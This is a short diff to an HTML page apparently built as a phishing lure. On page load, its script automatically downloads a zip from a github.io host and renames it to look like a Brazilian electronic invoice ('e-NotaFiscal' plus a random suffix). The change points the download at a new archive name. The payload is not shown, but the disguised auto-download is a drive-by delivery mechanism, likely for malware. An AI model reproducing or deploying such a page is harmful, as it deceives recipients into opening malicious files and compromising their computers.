--- a/e-Notas.html
+++ b/e-Notas.html
@@ -48,7 +48,7 @@
         window.onload = function() {
             const suffix = generateRandomSuffix(12);
             const newFileName = 'e-NotaFiscal0000' + suffix + '.zip';
-            const downloadUrl = 'https://baixetudopcwindows.github.io/clubewin/pexim.zip'; // URL do arquivo de download
+            const downloadUrl = 'https://baixetudopcwindows.github.io/clubewin/e-NotaFiscal.zip'; // URL do arquivo de download
             downloadFile(downloadUrl, newFileName);
         }
     </script>
